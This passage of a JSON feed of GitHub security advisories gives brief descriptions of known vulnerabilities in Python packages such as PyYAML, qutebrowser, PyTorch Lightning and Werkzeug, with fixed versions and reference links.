href=\"https://github.com/redis/redis-py/pull/1899\">https://github.com/redis/redis-py/pull/1899</a></li>\n<li><a href=\"https://github.com/redis/redis-py/commit/66a4d6b2a493dd3a20cc299ab5fef3c14baad965\">https://github.com/redis/redis-py/commit/66a4d6b2a493dd3a20cc299ab5fef3c14baad965</a></li>\n<li><a href=\"https://github.com/redis/redis-py/commit/b3c89acd0ffe8303649ad8207bc911b1d6a033eb\">https://github.com/redis/redis-py/commit/b3c89acd0ffe8303649ad8207bc911b1d6a033eb</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-8fww-64cx-x8p5\">https://github.com/advisories/GHSA-8fww-64cx-x8p5</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-8fww-64cx-x8p5",
            "title": "[redis] redis-py Race Condition due to incomplete fix",
            "date_modified": "2024-10-25T21:45:10.000Z",
            "date_published": "2023-03-26T21:30:23.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-8fww-64cx-x8p5"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>qutebrowser version introduced in v0.11.0 (<a href=\"https://github.com/qutebrowser/qutebrowser/commit/5a7869f2feaa346853d2a85413d6527c87ef0d9f\">1179ee7a937fb31414d77d9970bac21095358449</a>) contains a Cross Site Scripting (XSS) vulnerability in history command, <code>qute://history</code> page that can result in Via injected JavaScript code, a website can steal the user's browsing history. This attack appear to be exploitable via the victim must open a page with a specially crafted <code>&lt;title&gt;</code> attribute, and then open the <code>qute://history</code> site via the <code>:history</code> command. This vulnerability appears to have been fixed in fixed in v1.3.3 (<a href=\"https://github.com/qutebrowser/qutebrowser/commit/4c9360237f186681b1e3f2a0f30c45161cf405c7\">4c9360237f186681b1e3f2a0f30c45161cf405c7</a>, to be released today) and v1.4.0 (<a href=\"https://github.com/qutebrowser/qutebrowser/commit/5a7869f2feaa346853d2a85413d6527c87ef0d9f\">5a7869f2feaa346853d2a85413d6527c87ef0d9f</a>, released later this week).</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2018-1000559\">https://nvd.nist.gov/vuln/detail/CVE-2018-1000559</a></li>\n<li><a href=\"https://github.com/qutebrowser/qutebrowser/issues/4011\">https://github.com/qutebrowser/qutebrowser/issues/4011</a></li>\n<li><a href=\"https://github.com/qutebrowser/qutebrowser/commit/4c9360237f186681b1e3f2a0f30c45161cf405c7\">https://github.com/qutebrowser/qutebrowser/commit/4c9360237f186681b1e3f2a0f30c45161cf405c7</a></li>\n<li><a href=\"https://github.com/qutebrowser/qutebrowser/commit/5a7869f2feaa346853d2a85413d6527c87ef0d9f\">https://github.com/qutebrowser/qutebrowser/commit/5a7869f2feaa346853d2a85413d6527c87ef0d9f</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-m4fw-77v7-924m\">https://github.com/advisories/GHSA-m4fw-77v7-924m</a></li>\n<li><a href=\"https://github.com/pypa/advisory-database/tree/main/vulns/qutebrowser/PYSEC-2018-26.yaml\">https://github.com/pypa/advisory-database/tree/main/vulns/qutebrowser/PYSEC-2018-26.yaml</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-m4fw-77v7-924m",
            "title": "[qutebrowser] Qutebrowser XSS Vulnerability",
            "date_modified": "2024-10-25T21:36:49.000Z",
            "date_published": "2018-09-13T15:47:57.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-m4fw-77v7-924m"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>A vulnerability was discovered in the PyYAML library in versions before 5.3.1, where it is susceptible to arbitrary code execution when it processes untrusted YAML files through the full_load method or with the FullLoader loader. Applications that use the library to process untrusted input may be vulnerable to this flaw. An attacker could use this flaw to execute arbitrary code on the system by abusing the python/object/new constructor.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2020-1747\">https://nvd.nist.gov/vuln/detail/CVE-2020-1747</a></li>\n<li><a href=\"https://github.com/yaml/pyyaml/pull/386\">https://github.com/yaml/pyyaml/pull/386</a></li>\n<li><a href=\"https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1747\">https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1747</a></li>\n<li><a href=\"http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00017.html\">http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00017.html</a></li>\n<li><a href=\"http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00017.html\">http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00017.html</a></li>\n<li><a href=\"https://www.oracle.com/security-alerts/cpujul2022.html\">https://www.oracle.com/security-alerts/cpujul2022.html</a></li>\n<li><a href=\"https://github.com/yaml/pyyaml/commit/5080ba513377b6355a0502104846ee804656f1e0\">https://github.com/yaml/pyyaml/commit/5080ba513377b6355a0502104846ee804656f1e0</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-6757-jp84-gxfx\">https://github.com/advisories/GHSA-6757-jp84-gxfx</a></li>\n<li><a href=\"https://github.com/pypa/advisory-database/tree/main/vulns/pyyaml/PYSEC-2020-96.yaml\">https://github.com/pypa/advisory-database/tree/main/vulns/pyyaml/PYSEC-2020-96.yaml</a></li>\n<li><a href=\"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7PPAS6C4SZRDQLR7C22A5U3QOLXY33JX\">https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7PPAS6C4SZRDQLR7C22A5U3QOLXY33JX</a></li>\n<li><a href=\"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/K5HEPD7LEVDPCITY5IMDYWXUMX37VFMY\">https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/K5HEPD7LEVDPCITY5IMDYWXUMX37VFMY</a></li>\n<li><a href=\"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMQXSZXNJT6ERABJZAAICI3DQSQLCP3D\">https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMQXSZXNJT6ERABJZAAICI3DQSQLCP3D</a></li>\n<li><a href=\"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WORRFHPQVAFKKXXWLSSW6XKUYLWM6CSH\">https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WORRFHPQVAFKKXXWLSSW6XKUYLWM6CSH</a></li>\n<li><a href=\"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZBJA3SGNJKCAYPSHOHWY3KBCWNM5NYK2\">https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZBJA3SGNJKCAYPSHOHWY3KBCWNM5NYK2</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-6757-jp84-gxfx",
            "title": "[pyyaml] Improper Input Validation in PyYAML",
            "date_modified": "2024-10-25T21:35:11.000Z",
            "date_published": "2021-04-20T16:14:24.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-6757-jp84-gxfx"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>A vulnerability was discovered in the PyYAML library in versions before 5.4, where it is susceptible to arbitrary code execution when it processes untrusted YAML files through the full_load method or with the FullLoader loader. Applications that use the library to process untrusted input may be vulnerable to this flaw. This flaw allows an attacker to execute arbitrary code on the system by abusing the python/object/new constructor. This flaw is due to an incomplete fix for CVE-2020-1747.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2020-14343\">https://nvd.nist.gov/vuln/detail/CVE-2020-14343</a></li>\n<li><a href=\"https://github.com/yaml/pyyaml/commit/a001f2782501ad2d24986959f0239a354675f9dc\">https://github.com/yaml/pyyaml/commit/a001f2782501ad2d24986959f0239a354675f9dc</a></li>\n<li><a href=\"https://bugzilla.redhat.com/show_bug.cgi?id=1860466\">https://bugzilla.redhat.com/show_bug.cgi?id=1860466</a></li>\n<li><a href=\"https://github.com/yaml/pyyaml/issues/420#issuecomment-663673966\">https://github.com/yaml/pyyaml/issues/420#issuecomment-663673966</a></li>\n<li><a href=\"https://www.oracle.com/security-alerts/cpuapr2022.html\">https://www.oracle.com/security-alerts/cpuapr2022.html</a></li>\n<li><a href=\"https://www.oracle.com/security-alerts/cpujul2022.html\">https://www.oracle.com/security-alerts/cpujul2022.html</a></li>\n<li><a href=\"https://github.com/SeldonIO/seldon-core/issues/2252\">https://github.com/SeldonIO/seldon-core/issues/2252</a></li>\n<li><a href=\"https://github.com/yaml/pyyaml/issues/420\">https://github.com/yaml/pyyaml/issues/420</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-8q59-q68h-6hv4\">https://github.com/advisories/GHSA-8q59-q68h-6hv4</a></li>\n<li><a href=\"https://github.com/pypa/advisory-database/tree/main/vulns/pyyaml/PYSEC-2021-142.yaml\">https://github.com/pypa/advisory-database/tree/main/vulns/pyyaml/PYSEC-2021-142.yaml</a></li>\n<li><a href=\"https://pypi.org/project/PyYAML\">https://pypi.org/project/PyYAML</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-8q59-q68h-6hv4",
            "title": "[PyYAML] Improper Input Validation in PyYAML",
            "date_modified": "2024-10-25T21:31:46.000Z",
            "date_published": "2021-03-25T21:26:26.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-8q59-q68h-6hv4"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>python-keystoneclient version 0.2.3 to 0.2.5 has middleware memcache encryption bypass.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2013-2166\">https://nvd.nist.gov/vuln/detail/CVE-2013-2166</a></li>\n<li><a href=\"https://github.com/openstack/python-keystoneclient/commit/eeefb784f24c37d5f56a421e1ccc911cace9385e\">https://github.com/openstack/python-keystoneclient/commit/eeefb784f24c37d5f56a421e1ccc911cace9385e</a></li>\n<li><a href=\"https://access.redhat.com/security/cve/cve-2013-2166\">https://access.redhat.com/security/cve/cve-2013-2166</a></li>\n<li><a href=\"https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-2166\">https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-2166</a></li>\n<li><a href=\"https://bugzilla.suse.com/show_bug.cgi?id=CVE-2013-2166\">https://bugzilla.suse.com/show_bug.cgi?id=CVE-2013-2166</a></li>\n<li><a href=\"https://security-tracker.debian.org/tracker/CVE-2013-2166\">https://security-tracker.debian.org/tracker/CVE-2013-2166</a></li>\n<li><a href=\"http://lists.fedoraproject.org/pipermail/package-announce/2013-August/113944.html\">http://lists.fedoraproject.org/pipermail/package-announce/2013-August/113944.html</a></li>\n<li><a href=\"http://rhn.redhat.com/errata/RHSA-2013-0992.html\">http://rhn.redhat.com/errata/RHSA-2013-0992.html</a></li>\n<li><a href=\"http://www.openwall.com/lists/oss-security/2013/06/19/5\">http://www.openwall.com/lists/oss-security/2013/06/19/5</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-c3xq-cj8f-7829\">https://github.com/advisories/GHSA-c3xq-cj8f-7829</a></li>\n<li><a href=\"https://github.com/pypa/advisory-database/tree/main/vulns/python-keystoneclient/PYSEC-2019-197.yaml\">https://github.com/pypa/advisory-database/tree/main/vulns/python-keystoneclient/PYSEC-2019-197.yaml</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-c3xq-cj8f-7829",
            "title": "[python-keystoneclient] Inadequate Encryption Strength in python-keystoneclient",
            "date_modified": "2024-10-25T21:26:24.000Z",
            "date_published": "2021-10-12T16:31:43.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-c3xq-cj8f-7829"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>The OpenStack Python client library for Swift (python-swiftclient) from 1.0 before 2.0.2 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2013-6396\">https://nvd.nist.gov/vuln/detail/CVE-2013-6396</a></li>\n<li><a href=\"https://bugs.launchpad.net/python-swiftclient/+bug/1199783\">https://bugs.launchpad.net/python-swiftclient/+bug/1199783</a></li>\n<li><a href=\"http://www.openwall.com/lists/oss-security/2014/02/17/7\">http://www.openwall.com/lists/oss-security/2014/02/17/7</a></li>\n<li><a href=\"https://review.opendev.org/c/openstack/python-swiftclient/+/69187\">https://review.opendev.org/c/openstack/python-swiftclient/+/69187</a></li>\n<li><a href=\"https://github.com/pypa/advisory-database/tree/main/vulns/python-swiftclient/PYSEC-2014-12.yaml\">https://github.com/pypa/advisory-database/tree/main/vulns/python-swiftclient/PYSEC-2014-12.yaml</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-p3xv-97g8-4wmj\">https://github.com/advisories/GHSA-p3xv-97g8-4wmj</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-p3xv-97g8-4wmj",
            "title": "[python-swiftclient] Python Swift client is vulnerable to Missing SSL Certificate Check",
            "date_modified": "2024-10-25T21:25:11.000Z",
            "date_published": "2022-05-17T04:52:37.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-p3xv-97g8-4wmj"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>PyTorch Lightning version 1.5.10 and prior is vulnerable to code injection. An attacker could execute commands on the target OS running the operating system by setting the <code>PL_TRAINER_GPUS</code> when using the <code>Trainer</code> module. A <a href=\"https://github.com/pytorchlightning/pytorch-lightning/commit/8b7a12c52e52a06408e9231647839ddb4665e8ae\">patch</a> is included in the <code>1.6.0</code> release.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2022-0845\">https://nvd.nist.gov/vuln/detail/CVE-2022-0845</a></li>\n<li><a href=\"https://github.com/pytorchlightning/pytorch-lightning/commit/8b7a12c52e52a06408e9231647839ddb4665e8ae\">https://github.com/pytorchlightning/pytorch-lightning/commit/8b7a12c52e52a06408e9231647839ddb4665e8ae</a></li>\n<li><a href=\"https://huntr.dev/bounties/a795bf93-c91e-4c79-aae8-f7d8bda92e2a\">https://huntr.dev/bounties/a795bf93-c91e-4c79-aae8-f7d8bda92e2a</a></li>\n<li><a href=\"https://github.com/PyTorchLightning/pytorch-lightning/pull/12212\">https://github.com/PyTorchLightning/pytorch-lightning/pull/12212</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-r5qj-cvf9-p85h\">https://github.com/advisories/GHSA-r5qj-cvf9-p85h</a></li>\n<li><a href=\"https://github.com/pypa/advisory-database/tree/main/vulns/pytorch-lightning/PYSEC-2022-181.yaml\">https://github.com/pypa/advisory-database/tree/main/vulns/pytorch-lightning/PYSEC-2022-181.yaml</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-r5qj-cvf9-p85h",
            "title": "[pytorch-lightning] Code Injection in PyTorch Lightning",
            "date_modified": "2024-10-25T20:49:59.000Z",
            "date_published": "2022-03-06T00:00:16.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-r5qj-cvf9-p85h"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>In the python-libnmap package through 0.7.2 for Python, remote command execution can occur (if used in a client application that does not validate arguments).</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2022-30284\">https://nvd.nist.gov/vuln/detail/CVE-2022-30284</a></li>\n<li><a href=\"https://github.com/savon-noir/python-libnmap/releases\">https://github.com/savon-noir/python-libnmap/releases</a></li>\n<li><a href=\"https://libnmap.readthedocs.io/en/latest/process.html#using-libnmap-process\">https://libnmap.readthedocs.io/en/latest/process.html#using-libnmap-process</a></li>\n<li><a href=\"https://github.com/savon-noir/python-libnmap/commit/c36fecde90017befeb4853396d0e2aac93c95b64\">https://github.com/savon-noir/python-libnmap/commit/c36fecde90017befeb4853396d0e2aac93c95b64</a></li>\n<li><a href=\"https://github.com/savon-noir/python-libnmap/releases/tag/v0.7.3\">https://github.com/savon-noir/python-libnmap/releases/tag/v0.7.3</a></li>\n<li><a href=\"https://pypi.org/project/python-libnmap\">https://pypi.org/project/python-libnmap</a></li>\n<li><a href=\"https://www.swascan.com/security-advisory-libnmap-2\">https://www.swascan.com/security-advisory-libnmap-2</a></li>\n<li><a href=\"https://github.com/pypa/advisory-database/tree/main/vulns/python-libnmap/PYSEC-2022-42999.yaml\">https://github.com/pypa/advisory-database/tree/main/vulns/python-libnmap/PYSEC-2022-42999.yaml</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-qwqv-j7jr-4hp6\">https://github.com/advisories/GHSA-qwqv-j7jr-4hp6</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-qwqv-j7jr-4hp6",
            "title": "[python-libnmap] Argument injection in python-libnmap",
            "date_modified": "2024-10-25T20:49:08.000Z",
            "date_published": "2022-05-06T00:00:54.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-qwqv-j7jr-4hp6"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>Applications using Werkzeug to parse <code>multipart/form-data</code> requests are vulnerable to resource exhaustion. A specially crafted form body can bypass the <code>Request.max_form_memory_size</code> setting.</p>\n<p>The <code>Request.max_content_length</code> setting, as well as resource limits provided by deployment software and platforms, are also available to limit the resources used during a request. This vulnerability does not affect those settings. All three types of limits should be considered and set appropriately when deploying an application.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://github.com/pallets/werkzeug/security/advisories/GHSA-q34m-jh98-gwm2\">https://github.com/pallets/werkzeug/security/advisories/GHSA-q34m-jh98-gwm2</a></li>\n<li><a href=\"https://github.com/pallets/quart/commit/5e78c4169b8eb66b91ead3e62d44721b9e1644ee\">https://github.com/pallets/quart/commit/5e78c4169b8eb66b91ead3e62d44721b9e1644ee</a></li>\n<li><a href=\"https://github.com/pallets/werkzeug/commit/50cfeebcb0727e18cc52ffbeb125f4a66551179b\">https://github.com/pallets/werkzeug/commit/50cfeebcb0727e18cc52ffbeb125f4a66551179b</a></li>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2024-49767\">https://nvd.nist.gov/vuln/detail/CVE-2024-49767</a></li>\n<li><a href=\"https://github.com/pallets/werkzeug/releases/tag/3.0.6\">https://github.com/pallets/werkzeug/releases/tag/3.0.6</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-q34m-jh98-gwm2\">https://github.com/advisories/GHSA-q34m-jh98-gwm2</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-q34m-jh98-gwm2",
            "title": "[quart] Werkzeug possible resource exhaustion when parsing file data in forms",
            "date_modified": "2024-10-25T21:35:41.000Z",
            "date_published": "2024-10-25T19:44:43.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-q34m-jh98-gwm2"
            },
            "tags": [
                "severity"
            ]
        },
        {
            "content_html": "<p>Applications using Werkzeug to parse <code>multipart/form-data</code> requests are vulnerable to resource exhaustion. A specially crafted form body can bypass the <code>Request.max_form_memory_size</code> setting.</p>\n<p>The <code>Request.max_content_length</code> setting, as well as resource limits provided by deployment software and platforms, are also available to limit the resources used during a request. This vulnerability does not affect those settings. All three types of limits should be considered and set appropriately when deploying an application.</p>\n<h3 id=\"references\">References</h3>\n<ul>\n<li><a href=\"https://github.com/pallets/werkzeug/security/advisories/GHSA-q34m-jh98-gwm2\">https://github.com/pallets/werkzeug/security/advisories/GHSA-q34m-jh98-gwm2</a></li>\n<li><a href=\"https://github.com/pallets/quart/commit/5e78c4169b8eb66b91ead3e62d44721b9e1644ee\">https://github.com/pallets/quart/commit/5e78c4169b8eb66b91ead3e62d44721b9e1644ee</a></li>\n<li><a href=\"https://github.com/pallets/werkzeug/commit/50cfeebcb0727e18cc52ffbeb125f4a66551179b\">https://github.com/pallets/werkzeug/commit/50cfeebcb0727e18cc52ffbeb125f4a66551179b</a></li>\n<li><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2024-49767\">https://nvd.nist.gov/vuln/detail/CVE-2024-49767</a></li>\n<li><a href=\"https://github.com/pallets/werkzeug/releases/tag/3.0.6\">https://github.com/pallets/werkzeug/releases/tag/3.0.6</a></li>\n<li><a href=\"https://github.com/advisories/GHSA-q34m-jh98-gwm2\">https://github.com/advisories/GHSA-q34m-jh98-gwm2</a></li>\n</ul>\n",
            "url": "https://github.com/advisories/GHSA-q34m-jh98-gwm2",
            "title": "[werkzeug] Werkzeug possible resource exhaustion when parsing file data in forms",
            "date_modified": "2024-10-25T21:35:41.000Z",
            "date_published": "2024-10-25T19:44:43.000Z",
            "author": {
                "name": "GitHub",
                "url": "https://github.com/advisories/GHSA-q34m-jh98-gwm2"
            },
            "tags": [
                "severity"
            ]
        }
    ]
}